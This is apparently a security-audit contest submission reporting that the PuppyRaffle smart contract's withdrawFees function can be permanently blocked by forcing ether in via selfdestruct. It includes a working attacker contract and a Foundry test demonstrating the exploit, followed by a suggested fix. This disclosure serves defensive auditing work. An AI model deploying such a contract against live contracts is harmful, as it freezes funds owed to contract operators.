Submission Details
Severity:
Force send ether will break the withdrawFees function
Summary
Force transfer of ether can be used , by an attacker to block the withdrawFees function , and fees can never be withdrawn!
Vulnerability Details
Attacker contract:
// SPDX-License-Identifier: MIT
import {PuppyRaffle} from "./PuppyRaffle.sol";
contract ForceSendEther {
PuppyRaffle public puppyRaffle;
constructor(PuppyRaffle _puppyRaffle) payable {
puppyRaffle = _puppyRaffle;
}
function attack() public payable{
selfdestruct(payable(address(puppyRaffle)));
}
function deposit() public payable {
}
function whoIsAttacked() public returns (address) {
return address(puppyRaffle);
}
}
Setup function:
function setUp() public {
puppyRaffle = new PuppyRaffle(entranceFee, feeAddress, duration);
forceSend = new ForceSendEther(puppyRaffle);
}
Test:
function testForceSendEtherToPuppy() public {
//5 people entering raffle
uint totalPlayers = 4;
address[] memory players = new address[](4);
players[0]=(playerOne);
players[1]=(playerTwo);
players[2]=(playerThree);
players[3]=(playerFour);
puppyRaffle.enterRaffle{value: entranceFee * totalPlayers}(players);
skip(2 days);
puppyRaffle.selectWinner();
uint256 fees = (entranceFee * totalPlayers)*20/100;
assertEq(fees, address(puppyRaffle).balance);
//Force sending 1 ether to raffle
vm.deal(attacker, entranceFee);
vm.prank(attacker);
forceSend.deposit{value: entranceFee}();
forceSend.attack();
assertEq(entranceFee + fees, address(puppyRaffle).balance);
//Now fees can never be withdrawn!
vm.expectRevert("PuppyRaffle: There are currently players active!");
puppyRaffle.withdrawFees();
}
Impact
High
Tools Used
Foundry, Manual review
Recommendations
Don't use address(this).balance for require and compare to totalfees
Updates
Lead Judging Commences
Hamiltonite about 2 years ago
Submission Judgement Published Assigned finding tags:
greifers-send-money-to-contract-to-block-withdrawfees
Rewards breakdown
nSLOC
143This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.